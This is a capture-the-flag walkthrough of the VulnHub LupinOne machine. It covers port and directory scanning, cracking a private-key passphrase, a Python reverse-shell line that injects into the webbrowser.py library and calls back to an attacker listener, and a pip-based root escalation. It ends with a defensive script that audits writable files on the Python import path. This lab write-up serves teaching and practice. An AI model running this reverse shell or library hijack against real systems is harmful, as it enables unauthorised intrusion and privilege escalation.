VulnHub: LupinOne

Today we will take a look at VulnHub: LupinOne. My goal in sharing this writeup is to show you the way if you get stuck. Please try to understand each step and take notes.

  • Network scan

Command: sudo nmap -p- -sV -sC -oN nmap/open 192.168.0.110 --open

Let’s look at the “~myfiles” path.

We got an error, but let’s check again.

  • FFUF

Command: ffuf -u 'http://lupin/~FUZZ' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Here we have a username. Now let’s find his private key file. As we know, hidden files such as private keys have names that begin with a “.”, so we fuzz for names that start with a dot.

Command: ffuf -u 'http://lupin/~secret/.FUZZ' -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .txt,.pub -fw 20

We found the encoded text. Let’s use CyberChef to decode it. After researching, I found that it was Base58.

Let’s check the connection to the target machine.

We use the fasttrack.txt wordlist to crack the private key’s passphrase, as stated in the message.

Command: echo 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")' >> /usr/lib/python3.9/webbrowser.py

Command: nc -nvlp 4242

Command: sudo -u arsene /usr/bin/python3.9 /home/arsene/heist.py

https://gtfobins.github.io/gtfobins/pip/

And now we are root.
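Appending to /usr/lib/python3.9/webbrowser.py as an unprivileged user is only possible when that standard-library file is writable by that user, and any script that imports the module then runs the appended code as whoever launched the script. The audit below is an added example, not part of the original writeup: it lists files and directories on the Python import path that are group- or world-writable or owned by an untrusted UID. The function names and the trusted_uids parameter are assumptions introduced here.

```python
#!/usr/bin/env python3
"""Added example: list import-path files a non-root user could modify."""
import os
import stat
import sys

LOOSE = stat.S_IWGRP | stat.S_IWOTH        # group- or world-writable bits
MODULE_EXT = (".py", ".pyc", ".so", ".pth")


def audit_path(entry, trusted_uids=(0,)):
    """Return {path: (octal_mode, owner_uid)} for risky entries under `entry`.

    Directories are checked too: write access to a directory allows
    replacing any module inside it, whatever the file's own mode is.
    """
    findings = {}
    for root, _dirs, files in os.walk(entry):
        candidates = [root] + [os.path.join(root, name) for name in files
                               if name.endswith(MODULE_EXT)]
        for path in candidates:
            try:
                st = os.stat(path)          # follows symlinks: target mode counts
            except OSError:
                continue                    # broken link or unreadable entry
            if st.st_mode & LOOSE or st.st_uid not in trusted_uids:
                findings[path] = (oct(stat.S_IMODE(st.st_mode)), st.st_uid)
    return findings


def audit_import_path(paths=None, trusted_uids=(0,)):
    """Audit every directory on sys.path (or on the given list of paths)."""
    findings = {}
    for entry in (sys.path if paths is None else paths):
        real = os.path.realpath(entry or ".")
        if os.path.isdir(real):
            findings.update(audit_path(real, trusted_uids))
    return findings


if __name__ == "__main__":
    for path, (mode, uid) in sorted(audit_import_path().items()):
        print(f"{mode:>6} uid={uid:<6} {path}")
```

Run it with the same interpreter that privileged scripts or sudo rules use, since each interpreter has its own import path.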

“If you have any questions or comments, please do not hesitate to write. Have a good day.”

Hello, my name is Elman. I am from Azerbaijan. I wish you a good day.

Al1z4deh:~# echo "Welcome"
